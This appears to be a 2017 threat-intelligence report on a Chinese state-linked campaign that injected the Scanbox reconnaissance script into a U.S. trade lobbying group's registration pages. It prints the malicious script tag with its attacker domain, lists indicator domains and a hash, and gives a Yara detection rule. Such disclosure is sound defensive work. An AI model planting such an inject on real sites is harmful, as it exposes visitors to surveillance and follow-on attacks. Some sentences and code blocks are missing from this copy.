Operation TradeSecret: Cyber Espionage at the Heart of Global Trade
By Fidelis Cybersecurity Team
April 7, 2017
In late February, Fidelis Cybersecurity observed a strategic web compromise on a prominent U.S. lobbying group that served up malware to a very specific set of targets. The malware we observed has been used exclusively by Chinese nation-state threat actors in our observation and according to previously published research.
Based on our observations, we estimate that it is highly probable that this activity – which we’re calling ‘Operation TradeSecret’ -- targeted key private-sector players involved in lobbying efforts around United States' foreign trade policy. Subsequent research has led us to recover artifacts that indicate that a similar operation was conducted by threat actors targeting government officials in Japan. The connections we can draw from the Japanese campaign lead us to estimate that it is highly probable that the actors involved are known as APT10 (aka Stone Panda) in the threat research community.
Trade policy was at the center of the recent U.S. presidential election and is sure to feature prominently on the agenda when President Trump meets for the first time with China President Xi Jinping in Florida this week.
This paper documents our findings around the live campaign we observed, as well as technical details to allow other researchers to extend visibility into these actions. Fidelis Cybersecurity products detect all activity described in this report.
Fidelis observed, between February 27 and March 1, specific pages on the website of the National Foreign Trade Council (NFTC) including a link that led to a remote script that would execute when anyone visited that page. That remote script was the Scanbox framework, a well-known web reconnaissance tool that has been observed in previous campaigns dating back to at least 2014.
We first observed the inject on the registration page for a board of directors meeting in Washington D.C., scheduled for March 7, 2017.
The injected link would run the Scanbox framework on the computer of anyone who visited the web page.
The link from the NFTC site was removed on March 2. In our observation, the link was removed after the Scanbox site was taken down. We believe that the operation had almost certainly concluded by that time.
Scanbox was previously reported to have been used by multiple Chinese actor groups that are believed to be state sponsored, including the ones thought to be behind well-publicized intrusions in recent years -- namely, the Anthem Healthcare and the U.S. Office of Personnel Management (OPM) breaches.
Fidelis has made other previous
Scanbox in various campaigns. In the most
recent incident, we observed that it was
inserted on a
Uygher cultural news site. The
Uyghers are an ethnic minority group in
Xinjiang province in China, where a
struggle for political rights has been ongoing
for a few decades. In that instance, the
framework was hosted here:
support1.freetcp[ . ]com.
A web-cache listing the NFTC board of directors is here. These organizations represent some of the largest U.S. private sector companies that, presumably, have a keen interest in U.S. trade policy. Since the strategic web compromise was observed on the registration page for the board of directors meeting, it can be surmised that the campaign targeted the individuals visiting the site to register for the meeting.
NFTC members have been key participants in the dialogue around the composition of the new trade policy framework being formulated within the Trump administration. One example of this is the advocacy for the appointment of a new U.S. Trade Representative, as evidenced by this statement issued by the Chair of the NFTC on February 13.
All organizations that have representatives on the board of directors of the NFTC -- or those who would have a reason to visit the site -- should investigate potentially impacted hosts using indicators provided in this report. Since the reconnaissance tool is typically used to enable future targeting campaigns, it should be assumed that targeted individuals will be subject to further attacks -- such as spearphishing campaigns.
Cybersecurity conveyed its findings to
NFTC shortly after our initial
According to PwC and AlienVault, the Scanbox framework has various plugins that will load depending on the browser.
Software reconnaissance / Enumeration
Other features identified are:
Operating system id
Reconnaissance is used to allow attackers to later launch attacks against system vulnerabilities based on data obtained from the system.
In the NTFC page, the injected code was:
<script src=hxxp://club.personanddog [ . ] info/file/i/?1></script>
The above reference point to "1.js" in that server. Research on this domain lead us to the following "1.js" file at VT, which appears to be the one hosted at the above referenced domain: c88b11367a1f4625d4e7a8fb3a45f4c5.
The “1.js” file was first submitted to VirusTotal and Hybrid-Analysis[ . ]com on March 1, 2017. As of March 7, 2017, this Scanbox script has zero (0) AV detections as observed by a popular scanner. During analysis of the script, we discovered that this is an obfuscated version of the Scanbox script. Key changes have been made to variables in order to bypass classic signature detections.
When the observed Scanbox script runs, the visitor’s system is observed performing the following requests:
To draw a clear connection between the de-obfuscated version of the 1.js script and the raw Scanbox script, consider the following section from the code:
After making some replacements, the following segment of the code will clearly look like the Scanbox script that has been reported by multiple researchers:
Scanbox domain: Other GET request associated the “club.personanddog[ . ]info”
Open-source research led us to discover multiple requests associated with the Scanbox domain.
This information lead us to believe that the Scanbox script could have also been injected in the following pages on the NTFC website:
Report completed on "2017-02-27 15:16:39 CET"
NTFC Board of Directors Meeting
Report completed on "2017-02-28 00:14:04 CET"
NTFC Board Dinner with Mexico's
Ambassador, Geronimo Gutierrez (By Invitation)
Report completed on "2017-02-28 09:19:36 CET"
Report completed on "2017-02-28 11:20:37 CET"
Report completed on "2017-03-01 01:53:08 CET"
NFTC Welcomes New Chairman Ambassador
Other Scanbox Observations – Ministry of Foreign Affairs, Japan
When the script is accessed, the victim system beaconed to www[ . ]anzen.mofa-go-jp[ . ]com, a site that is masquerading as anzen.mofa.go.jp, a site on the Ministry’s website focused on Overseas Safety. It should be noted that this domain is specifically listed in the Operation CloudHopper report.
The following traffic was observed:
Yara Detection Rule
The following Yara rule could be used to detect the obfuscated version of the Scanbox Framework script observed in this research:
$sa1 = /(var|new|return)\s[_\$]+\s?/
$sa2 = "function"
$sa3 = "toString"
$sa4 = "toUpperCase"
$sa5 = "arguments.length"
$sa6 = "return"
$sa7 = "while"
$sa8 = "unescape("
$sa9 = "365*10*24*60*60*1000"
$sa10 = ">> 2"
$sa11 = "& 3) << 4"
$sa12 = "& 15) << 2"
$sa13 = ">> 6) | 192"
$sa14 = "& 63) | 128"
$sa15 = ">> 12) | 224"
all of them